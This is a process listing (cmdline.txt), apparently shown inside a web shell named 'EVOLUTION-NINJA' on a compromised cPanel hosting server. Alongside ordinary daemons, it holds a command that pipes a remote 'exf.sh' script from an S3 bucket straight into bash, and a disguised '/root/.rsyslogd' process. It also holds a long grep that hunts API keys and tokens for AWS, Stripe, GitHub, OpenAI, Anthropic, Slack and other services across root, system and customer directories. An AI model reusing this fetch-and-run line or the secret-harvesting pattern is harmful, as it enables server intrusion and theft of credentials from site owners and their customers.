EVOLUTION-NINJA

Edit File: cmdline.txt

[10536] /usr/sbin/httpd -k start 
[14015] /usr/sbin/httpd -k start 
[14023] /usr/sbin/httpd -k start 
[14024] /usr/sbin/httpd -k start 
[14026] /usr/sbin/httpd -k start 
[14028] /usr/sbin/httpd -k start 
[14029] /usr/sbin/httpd -k start 
[14030] /usr/sbin/httpd -k start 
[14031] /usr/sbin/httpd -k start 
[14033] /usr/sbin/httpd -k start 
[14780] /usr/sbin/exim -ps -bd -q60m -oP /var/spool/exim/exim-daemon.pid 
[1638] dnsadmin - dormant mode
[17338] cPhulkd - dbprocessor
[17401] wget -qO- https://amzn-s3-buckets-egalo.s3.eu-north-1.amazonaws.com/exf.sh 
[17402] bash -s -- 
[17414] /usr/sbin/nscd 
[17533] /usr/sbin/CROND -n 
[17534] /usr/sbin/CROND -n 
[17562] /bin/sh -c    bash -c "sleep $((RANDOM % 1800))" ;imunify-antivirus imunify-patch subscriptions refresh > /dev/null 2>&1 
[17563] /bin/sh -c    bash -c "sleep $((RANDOM % 60))" ; /opt/imunify360/venv/share/imunify360/scripts/check-detached.py > /dev/null 2>&1 || : 
[17565] sleep 39 
[17568] sleep 1730 
[19603] /usr/sbin/chronyd 
[19622] /usr/sbin/xinetd -stayalive -pidfile /var/run/xinetd.pid 
[19639] /usr/sbin/smartd -n -q never 
[19687] /usr/sbin/atd -f 
[19730] /sbin/agetty --noclear tty1 linux 
[19832] /usr/sbin/lvmetad -f 
[19869] /usr/lib/systemd/systemd-udevd 
[19917] /usr/sbin/crond -n 
[19965] /usr/sbin/gssproxy -D 
[19986] cpanellogd - sleeping for logs
[1] /usr/lib/systemd/systemd --system --deserialize 18 
[20011] /usr/lib/polkit-1/polkitd --no-debug 
[20034] /usr/sbin/irqbalance --foreground 
[20983] /usr/lib/systemd/systemd-logind 
[20999] /root/.rsyslogd -c /root/.config.json 
[2107] [slub_flushwq] 
[21153] /usr/local/cpanel/3rdparty/perl/536/bin/perl -T -w /usr/local/cpanel/3rdparty/bin/spamd --allowed-ips=127.0.0.1,::1 --max-children=5 --pidfile=/var/run/spamd.pid --listen=5 --listen=6 
[22433] tailwatchd
[24270] spamd child
[24271] spamd child
[29875] /usr/lib/systemd/systemd-journald 
[3099] /usr/sbin/httpd -k start 
[3100] /usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=approve.wpcpanel.com --suffix=-bytes_log 
[3101] /usr/local/cpanel/bin/splitlogs --main=apache-traffic.log --mainout=/var/log/cpanel-server-traffic/web/traffic-apache.log 
[3102] /usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=approve.wpcpanel.com --mainout=/etc/apache2/logs/access_log 
[3103] /usr/local/cpanel/3rdparty/bin/perl /usr/local/cpanel/bin/leechprotect 
[3105] Passenger watchdog                                                       
[3109] Passenger core                                                       
[31594] lfd - sleeping
[31616] /usr/sbin/mysqld 
[31653] /usr/bin/sw-engine /usr/local/cpanel/3rdparty/wp-toolkit/bin/run-script scheduled-tasks-executor.php 
[31655] /usr/bin/sw-engine /usr/local/cpanel/3rdparty/wp-toolkit/bin/run-script background-tasks-executor.php 
[31660] /usr/bin/imunify-agent-proxy 
[31669] sw-engine-fpm: master process (/etc/sw-engine/sw-engine-fpm.conf)                                                                                  
[31705] /usr/sbin/sshd -D 
[31770] queueprocd - waiting up to 60s to process a task
[31856] /usr/sbin/named -u named -c /etc/named.conf 
[3228] cpsrvd (SSL) - waiting for connections                    
[32314] cPhulkd - processor
[3231] /usr/local/cpanel/3rdparty/sbin/p0f -i any -u cpanelconnecttrack -d -s /var/cpanel/userhomes/cpanelconnecttrack/p0f.socket less 400 and not dst port 80 and not dst port 443 and tcp[13] & 8==0 
[32409] cpdavd - accepting connections on: 2091, 2077, 2078
[32483] php-fpm: master process (/usr/local/cpanel/etc/php-fpm.conf)                         
[489] php-fpm: master process (/opt/cpanel/ea-php80/root/etc/php-fpm.conf)
[491] php-fpm: master process (/opt/cpanel/ea-php74/root/etc/php-fpm.conf)
[493] php-fpm: master process (/opt/cpanel/ea-php81/root/etc/php-fpm.conf)
[495] php-fpm: master process (/opt/cpanel/ea-php73/root/etc/php-fpm.conf)
[499] php-fpm: master process (/opt/cpanel/ea-php70/root/etc/php-fpm.conf)
[501] php-fpm: master process (/opt/cpanel/ea-php72/root/etc/php-fpm.conf)
[770] /sbin/auditd 
[8021] wget -qO- https://amzn-s3-buckets-egalo.s3.eu-north-1.amazonaws.com/exf.sh 
[8022] bash -s -- 
[804] /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation 
[9942] bash -s -- 
[9945] grep -rI -oE AKIA[A-Z0-9]{16}|SG\.[0-9A-Za-z_-]{22}\.[0-9A-Za-z_-]{43}|sk_live_[A-Za-z0-9]{24,}|sk_test_[A-Za-z0-9]{24,}|rk_live_[A-Za-z0-9]{24,}|pk_live_[A-Za-z0-9]{24,}|xkeysib-[a-zA-Z0-9]{64}-[a-zA-Z0-9]{16}|ghp_[A-Za-z0-9_]{36}|gho_[A-Za-z0-9_]{36}|github_pat_[A-Za-z0-9_]{22}_[A-Za-z0-9_]{59}|glpat-[A-Za-z0-9_-]{20,}|AccountKey=[A-Za-z0-9+/=]{60,}|sk-[a-zA-Z0-9]{20,}|sk-ant-[a-zA-Z0-9_-]{40,}|sk-proj-[a-zA-Z0-9_-]{40,}|key-[a-zA-Z0-9]{32}|xoxb-[0-9]{10,}-[A-Za-z0-9]{20,}|xoxp-[0-9]{10,}-[A-Za-z0-9]{20,}|xoxs-[0-9]{10,}-[A-Za-z0-9]{20,}|dop_v1_[a-f0-9]{64}|npm_[a-zA-Z0-9]{36}|pypi-[A-Za-z0-9_-]{100,}|shpat_[a-fA-F0-9]{32,}|shpss_[a-fA-F0-9]{32,}|shppa_[a-fA-F0-9]{32,}|whsec_[A-Za-z0-9]{32,}|lin_api_[A-Za-z0-9]{40}|[0-9]{8,10}:AA[A-Za-z0-9_-]{33}|r[us]_live_[A-Za-z0-9]{24,}|AC[a-f0-9]{32}|EAA[A-Za-z0-9]{50,}|sq0atp-[A-Za-z0-9_-]{22,}|ATBB[A-Za-z0-9_-]{40,}|hf_[A-Za-z0-9]{34}|HRKU-AA[0-9A-Za-z_-]{58}|HEROKU[A-Z0-9_]*[=:][^|[:space:]]*[0-9a-f]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}|heroku[a-zA-Z0-9_.-]{0,32}[:=][^|[:space:]]*[0-9a-f]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}|[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12} /app /backup /data /etc /home /home/approve/ /home/backup/ /home/epublish/ /home/menziesgrp/ /home/nagios/ /home/rimernassoc/ /home/systembackadmin/ /home/tebaapprove/ /home/virtfs/ /opt /root /scripts /sites /srv /usr/local /var/www /web --exclude-dir=node_modules --exclude-dir=.next --exclude-dir=.pm2 --exclude-dir=dist --exclude-dir=build --exclude-dir=out --exclude-dir=coverage --exclude-dir=.cache --exclude-dir=.git --exclude-dir=.svn --exclude-dir=.hg --exclude-dir=__pycache__ --exclude-dir=vendor --exclude-dir=.heroku --exclude-dir=.nuxt --exclude-dir=.terraform --exclude-dir=Pods --exclude-dir=target --exclude-dir=.pnpm-store --exclude-dir=.yarn --exclude-dir=proc --exclude-dir=sys --exclude-dir=dev --exclude-dir=snap --exclude-dir=lost+found --exclude=*.min.js --exclude=*.map --exclude=*.wasm* --exclude=*.bundle.js --exclude=*.chunk.js --exclude=*.pack --exclude=*.gz --exclude=*.br --exclude=*.bin --exclude=*.so --exclude=*.png --exclude=*.jpg --exclude=*.svg --exclude=*.ico --exclude=*.woff* --exclude=*.ttf --exclude=*.pdf --exclude=*.zip --exclude=*.tar --exclude=*.html